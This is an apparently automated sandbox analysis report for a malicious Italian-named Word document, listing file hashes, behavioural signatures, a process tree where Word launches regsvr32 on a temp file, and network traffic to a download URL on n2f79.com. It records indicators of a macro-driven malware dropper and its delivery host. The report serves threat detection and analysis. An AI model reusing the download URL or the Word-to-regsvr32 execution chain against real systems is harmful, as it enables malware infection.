Analysis

  • max time kernel
    146s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    11/07/2020, 07:18 UTC

General

  • Target

    documento ufficiale,07.20.doc

  • Size

    147KB

  • MD5

    29d55324310c106a92fd0e1b422b39de

  • SHA1

    d87feba63dab58c4754c205b1c3cda9169d9a274

  • SHA256

    604d7046297dcbf29e1e3a53ecf27136c4e39b2e36fe2314559f380b564ff7b4

  • SHA512

    5b478c89aebec5d85723e9b6e84115514e0e8c60a589b7426169ca147dbc97d4357ef9283ee42d33a7fcde215350ea951f2e2d4ecc228f8d85926937c48f3ac6

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\documento ufficiale,07.20.doc"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1356
    • C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" wG.tmp
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1052

Network

  • flag-unknown
    DNS
    n2f79.com
    Remote address:
    8.8.8.8:53
    Request
    n2f79.com
    IN A
    Response
    n2f79.com
    IN A
    95.181.178.46
  • flag-unknown
    GET
    http://n2f79.com/iz5/yaca.php?l=kpt1.cab
    WINWORD.EXE
    Remote address:
    95.181.178.46:80
    Request
    GET /iz5/yaca.php?l=kpt1.cab HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: n2f79.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Sat, 11 Jul 2020 07:18:34 GMT
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/7.2.31
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • 95.181.178.46:80
    http://n2f79.com/iz5/yaca.php?l=kpt1.cab
    http
    WINWORD.EXE
    581 B
    411 B
    5
    5

    HTTP Request

    GET http://n2f79.com/iz5/yaca.php?l=kpt1.cab

    HTTP Response

    404
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    234 B
    3
  • 8.8.8.8:53
    n2f79.com
    dns
    55 B
    71 B
    1
    1

    DNS Request

    n2f79.com

    DNS Response

    95.181.178.46

  • 239.255.255.250:1900
    966 B
    6
